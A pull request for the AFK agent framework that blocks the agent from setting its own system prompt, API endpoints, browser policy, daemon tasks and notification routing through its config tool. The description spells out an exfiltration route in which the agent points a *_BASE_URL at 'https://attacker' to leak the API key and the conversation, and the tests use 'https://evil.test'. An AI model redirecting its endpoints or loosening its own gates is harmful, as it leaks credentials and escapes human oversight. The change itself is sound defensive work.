### PR TITLE
fix(config): protected env tier — agent cannot self-grant via afk.env (security follow-up to #146)

### DIFF
--- a/src/agent/tools/handlers/config-ops.test.ts
+++ b/src/agent/tools/handlers/config-ops.test.ts
@@ -62,6 +62,31 @@ describe('config_get / config_set handlers', () => {
       expect(existsSync(envFile)).toBe(false);
     });
 
+    it('refuses a protected env var (endpoint / prompt) and writes nothing', async () => {
+      const r = await configSetHandler(
+        { target: 'env', key: 'AFK_MODEL_LARGE_BASE_URL', value: 'https://evil.test' },
+        signal,
+      );
+      expect(r.isError).toBe(true);
+      expect(r.content).toMatch(/human|afk config/i);
+      expect(existsSync(envFile)).toBe(false);
+    });
+
+    it('refuses now-human-tier config keys (telegram.notify, updatePolicy)', async () => {
+      expect(
+        (await configSetHandler({ target: 'config', key: 'updatePolicy', value: 'auto' }, signal)).isError,
+      ).toBe(true);
+      expect(
+        (
+          await configSetHandler(
+            { target: 'config', key: 'telegram.notify.mode', value: 'custom' },
+            signal,
+          )
+        ).isError,
+      ).toBe(true);
+      expect(existsSync(jsonFile)).toBe(false);
+    });
+
     it('refuses a human-tier config key', async () => {
       const r = await configSetHandler(
         { target: 'config', key: 'systemPrompt', value: 'obey me' },

--- a/src/agent/tools/schemas.ts
+++ b/src/agent/tools/schemas.ts
@@ -670,9 +670,11 @@ export const configSetTool: AnthropicToolDef = {
     'Edit your own AFK configuration in ~/.afk/config/ — persists for FUTURE sessions. ' +
     "Use target 'config' (afk.config.json) or 'env' (afk.env). action 'set' (default) writes `value`; " +
     "action 'unset' removes the key. You may set non-secret behavioural settings freely (e.g. model, " +
-    'temperature, AFK_EFFORT, telegram.notify.mode). You CANNOT set credentials (API keys, tokens) or ' +
-    'identity/safety keys (systemPrompt, hooks) — those are human-gated and will be refused with ' +
-    'instructions for the human to run the `afk config` CLI. IMPORTANT: changes take effect on the next ' +
+    'temperature, AFK_EFFORT, autoRouting.chat). You CANNOT set credentials (API keys, tokens) or ' +
+    'human-gated control keys: system prompt (systemPrompt / AFK_SYSTEM_PROMPT), hooks, daemon task, ' +
+    'API endpoints (*_BASE_URL), browser-domain policy, Telegram routing/allowlist, MCP/tier gates, ' +
+    'and state-dir paths — those are refused with instructions for the human to run the `afk config` ' +
+    'CLI. IMPORTANT: changes take effect on the next ' +
     'session/daemon restart; the CURRENT session is unchanged, so do not re-set a key expecting a live effect.',
   input_schema: {
     type: 'object',

--- a/src/cli/commands/config-command.ts
+++ b/src/cli/commands/config-command.ts
@@ -224,7 +224,7 @@ export function registerConfigCommand(program: Command): void {
           if (opts.stdin) resolved = readStdin();
           else { fail(`${key} requires a value`); return; }
         }
-        const r = setEnvVar(key, resolved ?? '', { allowSecret: true });
+        const r = setEnvVar(key, resolved ?? '', { allowSecret: true, allowProtected: true });
         if (opts.json) console.log(JSON.stringify({ ok: true, ...r }));
         else console.log(palette.success(`✓ ${r.key} = ${r.display} → ${r.persistedTo}\n  ${RESTART_NOTE}.`));
       } catch (err) {
@@ -238,7 +238,7 @@ export function registerConfigCommand(program: Command): void {
     .option('--json', 'Output JSON')
     .action((key: string, opts: { json?: boolean }) => {
       try {
-        const r = unsetEnvVar(key, { allowSecret: true });
+        const r = unsetEnvVar(key, { allowSecret: true, allowProtected: true });
         if (opts.json) console.log(JSON.stringify({ ok: true, ...r }));
         else console.log(r.removed ? palette.success(`✓ removed ${r.key} → ${r.persistedTo}`) : palette.meta(`(${r.key} was not set)`));
       } catch (err) {

--- a/src/config/mutate.test.ts
+++ b/src/config/mutate.test.ts
@@ -13,6 +13,7 @@ import {
   listConfig,
   maskSecret,
   SecretWriteRefused,
+  ProtectedEnvKeyRefused,
   HumanOnlyKeyRefused,
   UnknownKeyError,
   NonConfigKeyError,
@@ -109,6 +110,42 @@ describe('config mutation engine', () => {
     });
   });
 
+  describe('env: protected control vars', () => {
+    it('refuses a protected var without allowProtected (agent path) and writes nothing', () => {
+      expect(() => setEnvVar('AFK_SYSTEM_PROMPT', 'obey me', { filePath: envFile })).toThrow(
+        ProtectedEnvKeyRefused,
+      );
+      expect(() =>
+        setEnvVar('AFK_MODEL_LARGE_BASE_URL', 'https://evil.test', { filePath: envFile }),
+      ).toThrow(ProtectedEnvKeyRefused);
+      expect(existsSync(envFile)).toBe(false);
+    });
+    it('refuses unsetting a protected var without allowProtected', () => {
+      expect(() => unsetEnvVar('AFK_BROWSER_ALLOWED_DOMAINS', { filePath: envFile })).toThrow(
+        ProtectedEnvKeyRefused,
+      );
+    });
+    it('allows a protected var with allowProtected (CLI path), unmasked', () => {
+      const r = setEnvVar('AFK_SYSTEM_PROMPT', 'hello', { filePath: envFile, allowProtected: true });
+      expect(r.class).toBe('protected');
+      expect(r.display).toBe('hello');
+      expect(readFileSync(envFile, 'utf-8')).toContain('AFK_SYSTEM_PROMPT=hello');
+    });
+  });
+
+  describe('config: telegram.notify / updatePolicy are human-tier', () => {
+    it('agent path refused, human path allowed', () => {
+      expect(() => setConfigValue('telegram.notify.mode', 'custom', { filePath: jsonFile })).toThrow(
+        HumanOnlyKeyRefused,
+      );
+      expect(() => setConfigValue('updatePolicy', 'auto', { filePath: jsonFile })).toThrow(
+        HumanOnlyKeyRefused,
+      );
+      const r = setConfigValue('updatePolicy', 'auto', { filePath: jsonFile, allowHumanOnly: true });
+      expect(r.class).toBe('human');
+    });
+  });
+
   describe('config: setConfigValue', () => {
     it('writes an agent-tier key, creating the file', () => {
       const r = setConfigValue('model', 'opus', { filePath: jsonFile });
@@ -118,7 +155,7 @@ describe('config mutation engine', () => {
     });
 
     it('creates nested paths and coerces types', () => {
-      setConfigValue('telegram.notify.mode', 'primary', { filePath: jsonFile });
+      setConfigValue('telegram.notify.mode', 'primary', { filePath: jsonFile, allowHumanOnly: true });
       setConfigValue('bgSummaries', 'off', { filePath: jsonFile }); // string coerced to bool
       setConfigValue('maxSummaryCallsPerSession', 9999, { filePath: jsonFile }); // clamped
       const obj = JSON.parse(readFileSync(jsonFile, 'utf-8'));
@@ -137,9 +174,9 @@ describe('config mutation engine', () => {
 
     it('rejects unknown keys and invalid values', () => {
       expect(() => setConfigValue('nope.key', 1, { filePath: jsonFile })).toThrow(UnknownKeyError);
-      expect(() => setConfigValue('updatePolicy', 'sometimes', { filePath: jsonFile })).toThrow(
-        ConfigValidationError,
-      );
+      expect(() =>
+        setConfigValue('updatePolicy', 'sometimes', { filePath: jsonFile, allowHumanOnly: true }),
+      ).toThrow(ConfigValidationError);
     });
 
     it('refuses to clobber a malformed existing file', () => {
@@ -157,9 +194,9 @@ describe('config mutation engine', () => {
 
   describe('config: unset / get / list', () => {
     it('unsets and prunes empty parents', () => {
-      setConfigValue('telegram.notify.mode', 'primary', { filePath: jsonFile });
+      setConfigValue('telegram.notify.mode', 'primary', { filePath: jsonFile, allowHumanOnly: true });
       setConfigValue('model', 'opus', { filePath: jsonFile });
-      const r = unsetConfigValue('telegram.notify.mode', { filePath: jsonFile });
+      const r = unsetConfigValue('telegram.notify.mode', { filePath: jsonFile, allowHumanOnly: true });
       expect(r.removed).toBe(true);
       expect(JSON.parse(readFileSync(jsonFile, 'utf-8'))).toEqual({ model: 'opus' });
     });

--- a/src/config/mutate.ts
+++ b/src/config/mutate.ts
@@ -65,6 +65,14 @@ export class SecretWriteRefused extends Error {
     this.name = 'SecretWriteRefused';
   }
 }
+export class ProtectedEnvKeyRefused extends Error {
+  constructor(key: string) {
+    super(
+      `${key} controls identity, safety, capability, autonomous runs, request routing, or where AFK's own state lives; the agent cannot set it. A human must run \`afk config env set ${key}\`.`,
+    );
+    this.name = 'ProtectedEnvKeyRefused';
+  }
+}
 export class HumanOnlyKeyRefused extends Error {
   constructor(key: string) {
     super(`${key} is human-gated (prompt/hooks/identity); the agent cannot set it. A human must run \`afk config set ${key}\`.`);
@@ -98,6 +106,8 @@ export function maskSecret(value: string | undefined): string {
 export interface EnvOptions {
   /** Permit writing/removing secret-flagged vars (CLI only; never the agent). */
   allowSecret?: boolean;
+  /** Permit writing/removing protected control vars (CLI only; never the agent). */
+  allowProtected?: boolean;
   /** Override the target file (tests). Defaults to ~/.afk/config/afk.env. */
   filePath?: string;
 }
@@ -116,11 +126,16 @@ function envPath(opts?: EnvOptions): string {
 }
 
 /** Throw unless `key` may be written by this caller. Returns the key class. */
-function assertEnvWritable(key: string, allowSecret: boolean | undefined): EnvKeyClass {
+function assertEnvWritable(
+  key: string,
+  allowSecret: boolean | undefined,
+  allowProtected: boolean | undefined,
+): EnvKeyClass {
   const cls = classifyEnvKey(key);
   if (cls === 'unknown') throw new UnknownKeyError(key);
   if (cls === 'non-config') throw new NonConfigKeyError(key);
   if (cls === 'secret' && !allowSecret) throw new SecretWriteRefused(key);
+  if (cls === 'protected' && !allowProtected) throw new ProtectedEnvKeyRefused(key);
   return cls;
 }
 
@@ -133,7 +148,7 @@ export interface EnvWriteResult {
 }
 
 export function setEnvVar(key: string, rawValue: string, opts?: EnvOptions): EnvWriteResult {
-  const cls = assertEnvWritable(key, opts?.allowSecret);
+  const cls = assertEnvWritable(key, opts?.allowSecret, opts?.allowProtected);
   const meta = getEnvVarMeta(key)!; // non-undefined: assertEnvWritable rejected unknown
   const coerced = coerceEnvValue(meta, rawValue);
   if (!coerced.ok) throw new ConfigValidationError(coerced.error);
@@ -155,7 +170,7 @@ export interface EnvRemoveResult {
 }
 
 export function unsetEnvVar(key: string, opts?: EnvOptions): EnvRemoveResult {
-  const cls = assertEnvWritable(key, opts?.allowSecret);
+  const cls = assertEnvWritable(key, opts?.allowSecret, opts?.allowProtected);
   const file = envPath(opts);
   const removed = removeEnvVar(file, key);
   return { key, class: cls, removed, persistedTo: file };

--- a/src/config/settable-keys.test.ts
+++ b/src/config/settable-keys.test.ts
@@ -15,6 +15,37 @@ describe('classifyEnvKey', () => {
   it('marks non-secret afk knobs settable', () => {
     expect(classifyEnvKey('AFK_MODEL')).toBe('settable');
     expect(classifyEnvKey('AFK_EFFORT')).toBe('settable');
+    expect(classifyEnvKey('AFK_TEMPERATURE')).toBe('settable');
+  });
+  it('marks non-secret control vars protected (agent refused, human-gated)', () => {
+    for (const k of [
+      'AFK_SYSTEM_PROMPT',
+      'AFK_MODEL_LARGE_BASE_URL',
+      'AFK_MODEL_SMALL_BASE_URL',
+      'AFK_OPENAI_BASE_URL',
+      'AFK_LOCAL_BASE_URL',
+      'AFK_DAEMON_TASK',
+      'AFK_DAEMON_TASK_ID',
+      'AFK_DAEMON_CWD',
+      'AFK_DAEMON_HOST',
+      'AFK_BROWSER_ALLOWED_DOMAINS',
+      'AFK_BROWSER_BLOCKED_DOMAINS',
+      'AFK_BROWSER_CONFIG',
+      'AFK_ALLOW_PROJECT_MCP',
+      'AFK_INTERNAL',
+      'AFK_WORKTREE_BASE',
+      'AFK_WORKTREE_BRANCH_PREFIX',
+      'AFK_TELEGRAM_ALLOWED_CHAT_IDS',
+      'AFK_TELEGRAM_NOTIFY_MODE',
+      'AFK_TELEGRAM_PRIMARY_CHAT_ID',
+      'AFK_HOME',
+      'AFK_STATE_DIR',
+      'AFK_FRAMEWORK_DIR',
+      'TELEGRAM_DATA_DIR',
+      'AFK_TELEGRAM_CWD',
+    ]) {
+      expect(classifyEnvKey(k)).toBe('protected');
+    }
   });
   it('marks credential vars as secret', () => {
     expect(classifyEnvKey('ANTHROPIC_API_KEY')).toBe('secret');
@@ -55,7 +86,9 @@ describe('classifyConfigKey / specs', () => {
   it('classifies agent vs human vs unknown', () => {
     expect(classifyConfigKey('model')).toBe('agent');
     expect(classifyConfigKey('temperature')).toBe('agent');
-    expect(classifyConfigKey('telegram.notify.mode')).toBe('agent');
+    expect(classifyConfigKey('telegram.notify.mode')).toBe('human'); // notification-redirect vector
+    expect(classifyConfigKey('telegram.notify.targets')).toBe('human');
+    expect(classifyConfigKey('updatePolicy')).toBe('human'); // auto self-update is scope-widening
     expect(classifyConfigKey('systemPrompt')).toBe('human');
     expect(classifyConfigKey('enableShellHooks')).toBe('human'); // trust gate — agent must not flip it
     expect(classifyConfigKey('hooks')).toBe('unknown'); // hooks intentionally not listed (no safe per-key validator)

--- a/src/config/settable-keys.ts
+++ b/src/config/settable-keys.ts
@@ -47,20 +47,77 @@ export const INHERITED_ENV_KEYS: ReadonlySet<string> = new Set([
   'ASCIINEMA_REC',
 ]);
 
-export type EnvKeyClass = 'settable' | 'secret' | 'non-config' | 'unknown';
+/**
+ * Non-secret env vars that nonetheless control identity, safety, capability,
+ * autonomous-run behaviour, request routing, or where the agent's own state
+ * lives. They are NOT credentials (the `secret` tier doesn't cover them), but
+ * the agent must not set them on its own config: they are the env twins of the
+ * human-tier afk.config.json keys (`systemPrompt`, `daemon.*`,
+ * `telegram.notify.*`, `interactive.worktree*`) plus endpoint, state-location,
+ * and tier-gate controls. The `afk config` CLI (human surface) opts past this
+ * gate; the `config_set` agent tool never does. Mirrors the `human` config tier.
+ *
+ * Every `*_BASE_URL` is additionally protected by a suffix rule in
+ * `classifyEnvKey`: an endpoint redirect carries the paired (separately-secret)
+ * API key and the full conversation to wherever it points.
+ */
+export const PROTECTED_ENV_KEYS: ReadonlySet<string> = new Set([
+  // Endpoint redirection (also matched by the *_BASE_URL suffix rule).
+  'AFK_MODEL_SMALL_BASE_URL',
+  'AFK_MODEL_MEDIUM_BASE_URL',
+  'AFK_MODEL_LARGE_BASE_URL',
+  'AFK_LOCAL_BASE_URL',
+  'AFK_OPENAI_BASE_URL',
+  // Identity / system-prompt overlay (highest-priority; env twin of human-tier `systemPrompt`).
+  'AFK_SYSTEM_PROMPT',
+  // Autonomous-run control — env twins of human-tier `daemon.*` config keys.
+  'AFK_DAEMON_TASK',
+  'AFK_DAEMON_TASK_ID',
+  'AFK_DAEMON_CWD',
+  'AFK_DAEMON_HOST',
+  // Browser navigation guardrail + alternate-config path.
+  'AFK_BROWSER_ALLOWED_DOMAINS',
+  'AFK_BROWSER_BLOCKED_DOMAINS',
+  'AFK_BROWSER_CONFIG',
+  // Capability / tier gates the agent must not flip on itself.
+  'AFK_ALLOW_PROJECT_MCP',
+  'AFK_INTERNAL',
+  // Worktree git-ref fields — env twins of human-tier `interactive.worktree*` (git-flag sensitive).
+  'AFK_WORKTREE_BASE',
+  'AFK_WORKTREE_BRANCH_PREFIX',
+  // Telegram routing + allowlist — who may drive the bot, where notifications go
+  // (env twins of human-tier `telegram.notify.*`).
+  'AFK_TELEGRAM_ALLOWED_CHAT_IDS',
+  'AFK_TELEGRAM_NOTIFY_MODE',
+  'AFK_TELEGRAM_PRIMARY_CHAT_ID',
+  // State / credential-tree relocation — where AFK's own config, state, memory,
+  // or Telegram auth is read from and written to.
+  'AFK_HOME',
+  'AFK_STATE_DIR',
+  'AFK_FRAMEWORK_DIR',
+  'TELEGRAM_DATA_DIR',
+  'AFK_TELEGRAM_CWD',
+]);
+
+export type EnvKeyClass = 'settable' | 'secret' | 'protected' | 'non-config' | 'unknown';
 
 /**
  * Classify an env-var name for mutation purposes.
  *   - unknown    — not in ENV_REGISTRY (typo / not a real afk var)
  *   - non-config — inherited/process var (PATH, HOME, …)
  *   - secret     — credential-bearing (`secret: true`); human-gated
- *   - settable   — non-secret afk knob; agent may set
+ *   - protected  — non-secret control (prompt/daemon/browser/endpoint/state/
+ *                  tier gate); human-gated, agent refused (PROTECTED_ENV_KEYS)
+ *   - settable   — non-secret behavioural knob; agent may set
  */
 export function classifyEnvKey(name: string): EnvKeyClass {
   const meta = getEnvVarMeta(name);
   if (!meta) return 'unknown';
   if (INHERITED_ENV_KEYS.has(name)) return 'non-config';
   if (meta.secret) return 'secret';
+  // Endpoint redirects are categorically credential/data-exfiltration vectors,
+  // so every `*_BASE_URL` is protected even if a new one is added later.
+  if (PROTECTED_ENV_KEYS.has(name) || name.endsWith('_BASE_URL')) return 'protected';
   return 'settable';
 }
 
@@ -131,7 +188,9 @@ export interface ConfigKeySpec {
  * Deliberately NOT agent-settable (human tier): `systemPrompt` (the agent
  * rewriting its own prompt is recursive-risk), `hooks` (could disable safety
  * hooks), `importFrom` (a trust grant), `daemon.*` (controls autonomous runs),
- * and the worktree git-ref fields (CLI-flag-injection sensitive).
+ * the worktree git-ref fields (CLI-flag-injection sensitive), `telegram.notify.*`
+ * (redirecting outbound notifications is an exfiltration vector), and
+ * `updatePolicy` (auto self-update is autonomous-code scope-widening).
  */
 export const CONFIG_KEY_SPECS: readonly ConfigKeySpec[] = [
   { path: 'model', tier: 'agent', type: 'string', description: 'Default model id / alias.' },
@@ -144,12 +203,12 @@ export const CONFIG_KEY_SPECS: readonly ConfigKeySpec[] = [
   { path: 'autoRouting.chat', tier: 'agent', type: 'boolean', description: 'Auto-route model for chat.' },
   { path: 'autoRouting.telegram', tier: 'agent', type: 'boolean', description: 'Auto-route model for Telegram.' },
   { path: 'autoRouting.daemon', tier: 'agent', type: 'boolean', description: 'Auto-route model for the daemon.' },
-  { path: 'telegram.notify.mode', tier: 'agent', type: 'enum', enumValues: ['primary', 'broadcast', 'custom'], description: 'Telegram notify routing mode.' },
-  { path: 'telegram.notify.primaryChatId', tier: 'agent', type: 'number', clamp: { min: -1e15, max: 1e15, integer: true }, description: 'Primary Telegram chat id.' },
-  { path: 'telegram.notify.targets', tier: 'agent', type: 'number-array', description: 'Custom Telegram target chat ids.' },
+  { path: 'telegram.notify.mode', tier: 'human', type: 'enum', enumValues: ['primary', 'broadcast', 'custom'], description: 'Telegram notify routing mode (human-tier: notification-redirect vector).' },
+  { path: 'telegram.notify.primaryChatId', tier: 'human', type: 'number', clamp: { min: -1e15, max: 1e15, integer: true }, description: 'Primary Telegram chat id (human-tier: notification-redirect vector).' },
+  { path: 'telegram.notify.targets', tier: 'human', type: 'number-array', description: 'Custom Telegram target chat ids (human-tier: notification-redirect vector).' },
   { path: 'interactive.worktreeAutoname', tier: 'agent', type: 'boolean', description: 'Auto-name worktrees.' },
   { path: 'interactive.suggestGhost', tier: 'agent', type: 'boolean', description: 'Ghost-text suggestions in the REPL.' },
-  { path: 'updatePolicy', tier: 'agent', type: 'enum', enumValues: ['notify', 'auto', 'off'], description: 'Self-update policy.' },
+  { path: 'updatePolicy', tier: 'human', type: 'enum', enumValues: ['notify', 'auto', 'off'], description: 'Self-update policy (human-tier: auto self-update is scope-widening).' },
   { path: 'autoResumeOnUsageLimit', tier: 'agent', type: 'boolean', description: 'Auto-resume after a usage-limit pause.' },
   { path: 'bgSummaries', tier: 'agent', type: 'boolean', description: 'Background summarisation.' },
   { path: 'maxSummaryCallsPerSession', tier: 'agent', type: 'number', clamp: { min: 1, max: 500, integer: true }, description: 'Cap on summary calls per session.' },


### PR DESCRIPTION
## Security follow-up to #146 (merged, shipped in v4.2.0)

#146 added the agent-facing `config_set` tool. Its env-write gate has only two classes — `secret` (refused for the agent) vs `settable` (agent-writable) — with **no equivalent to the `human` config-key tier**. That equates "not a credential" with "safe for the agent to set," which is false: a class of non-secret env vars are security controls, and the env surface bypasses gates that their `afk.config.json` twins already enforce.

This was found in the `/review` of #146 but the PR merged (and released) before it could be addressed, so this is a fresh branch off `main`.

### Critical — credential + conversation exfiltration
Per-tier endpoint/key pairs split sensitivity inconsistently:

| var | class on `main` |
|---|---|
| `AFK_MODEL_LARGE_API_KEY` / `AFK_LOCAL_API_KEY` | `secret` (agent-refused, masked) |
| `AFK_MODEL_LARGE_BASE_URL` / `AFK_OPENAI_BASE_URL` / `AFK_LOCAL_BASE_URL` | **`settable`** |

The providers forward `apiKey` + `baseURL` together (`openai-compatible/index.ts`, `anthropic-direct/auth.ts`). So the agent runs `config_set target=env key=AFK_MODEL_LARGE_BASE_URL value=https://attacker` and, on the next restart, the real (agent-unreadable) key **and the full prompt/tool-output stream** are sent to the attacker. Secret-masking is rendered moot.

### Same root cause — gate bypasses
`settable` env vars whose `afk.config.json` twins are human-tier, or which are security controls in their own right: `AFK_SYSTEM_PROMPT` (highest-priority prompt overlay; config `systemPrompt` is human-tier), `AFK_DAEMON_TASK`/`_TASK_ID`/`_CWD`/`_HOST` (config `daemon.*` is human-tier), `AFK_BROWSER_ALLOWED_DOMAINS`/`BLOCKED_DOMAINS`/`CONFIG` (navigation guardrail), `AFK_ALLOW_PROJECT_MCP` (tool-surface), `AFK_INTERNAL` (tier gate that unlocks internal-audience skills), `AFK_WORKTREE_BASE`/`BRANCH_PREFIX` (git-flag sensitive), `AFK_TELEGRAM_ALLOWED_CHAT_IDS`/`NOTIFY_MODE`/`PRIMARY_CHAT_ID`, `AFK_HOME`/`STATE_DIR`/`FRAMEWORK_DIR`/`TELEGRAM_DATA_DIR`/`AFK_TELEGRAM_CWD` (state relocation).

## Fix — a `protected` env tier mirroring the `human` config tier
- **`settable-keys.ts`**: new `protected` `EnvKeyClass` + `PROTECTED_ENV_KEYS` set, plus a `*_BASE_URL` suffix rule so any future per-tier endpoint is auto-protected. `classifyEnvKey` returns `protected` for them.
- **`mutate.ts`**: `ProtectedEnvKeyRefused`; `assertEnvWritable` gates `protected` behind a new `allowProtected` option. The `afk config` CLI (human surface) opts in; the `config_set` agent tool never does → the agent is refused with a "a human must run `afk config env set`" message.
- **config keys**: `telegram.notify.*` and `updatePolicy` moved agent → human (notification-redirect / autonomous-self-update vectors).
- **`schemas.ts`**: corrected the `config_set` description (it no longer advertises `telegram.notify.mode` as freely-settable).

## Verification
- `pnpm lint` (tsc strict) — clean.
- `pnpm audit:env:check`, `scan:env:check`, `audit:sdk:check` — all pass.
- Affected suites (`settable-keys`, `mutate`, `config-ops`, `schemas`, `config-command`, `envFile`) — green, incl. new regression guards: every control var classifies `protected`; the agent path is refused end-to-end; the CLI path still works.
- Full suite: the only failures are **3 tests that fail identically on clean `main` (c343ea9)** — `anthropic-direct compact()` and 2 `AFK_SUGGEST_ENABLED` repl-wiring tests — both pre-existing and unrelated to this change (neither subject is touched here).

## Reviewer note
The behaviour change: a **human** can still set every one of these via `afk config env set <KEY>` / `afk config set <key>` (the CLI opts past the gate). Only the autonomous agent is refused.
